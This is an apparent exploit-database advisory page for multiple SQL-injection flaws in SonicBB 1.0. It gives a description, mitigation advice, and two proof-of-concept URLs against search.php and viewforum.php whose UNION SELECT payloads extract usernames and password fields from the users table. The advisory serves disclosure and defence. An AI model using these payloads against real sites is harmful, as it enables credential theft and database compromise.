header-logo
Suggest Exploit
vendor:
SonicBB
by:
7.5
CVSS
HIGH
SQL-injection
89
CWE
Product Name: SonicBB
Affected Version From: SonicBB 1.0
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:sonicbb_project:sonicbb:1.0
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Multiple SQL-injection vulnerabilities in SonicBB

SonicBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to properly sanitize user-supplied data before using it in SQL queries. Implementing parameterized queries or prepared statements can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23964/info

SonicBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SonicBB 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/path/search.php?query=1&part=post`<> '' UNIoN SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/

http://www.example.com/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23